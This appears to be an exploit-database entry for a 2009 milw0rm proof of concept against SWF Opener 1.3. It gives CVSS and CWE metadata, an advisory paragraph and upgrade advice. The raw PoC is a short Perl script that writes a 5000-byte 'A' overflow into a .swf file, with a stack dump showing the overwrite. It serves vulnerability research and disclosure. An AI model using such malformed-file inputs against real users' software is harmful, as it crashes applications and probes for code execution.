SWF Opener .swf Off By One / Underground Bof Poc

vendor:

SWF Opener

by:

milw0rm.com

9.3

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: SWF Opener

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: Yes

Related CWE: N/A

CPE: a:browsertools:swf_opener

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

SWF Opener .swf Off By One / Underground Bof Poc

SWF Opener is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will likely result in a denial-of-service condition.

Mitigation:

Upgrade to the latest version of SWF Opener.

Source

Exploit-DB raw data:

# SWF Opener .swf Off By One / Underground Bof Poc
# Probably impossible to exploit, but who knows? -_- At least, there still exist Underground stack overflows in :d
# Version: 1.3
# http://www.browsertools.net/downloads/SWFOpenerSetup.exe
# usage perl poc.pl >>xpl.swf
# In The Stack
# 0012BBE8  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BBF0  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BBF8  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC00  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC08  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC10  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC18  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC20  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC28  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC30  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC38  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC40  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC48  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC50  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC58  41 41 41 41 41 41 41 41  AAAAAAAA
# 0012BC60  41 41 41 41 41 41 41 41  AAAAAAAA
#>>poc.pl
my $bof="\x41" x 5000;
print $bof;

# milw0rm.com [2009-04-09]